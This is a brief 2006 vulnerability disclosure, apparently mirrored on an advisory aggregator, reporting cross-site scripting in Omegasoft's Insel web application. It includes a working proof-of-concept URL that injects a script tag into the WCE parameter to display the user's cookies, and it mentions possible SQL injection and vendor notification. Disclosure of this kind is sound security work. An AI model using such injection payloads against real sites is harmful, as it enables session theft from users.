Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12837
HistoryMay 27, 2006 - 12:00 a.m.

XSS in Omegasoft's Insel

2006-05-2700:00:00
vulners.com
4

Hi together,

This also works on serveral web-pages of this product.
http://host/OmegaMw7a.ASP?WCI=Logon&WCE=0;<script>alert(unescape(document.cookie));</script>
There might be some ways for SQL-Injection, too, but i am not willing
to try this at the real system :)

Vendor notified as CC

regards
MC.Iglo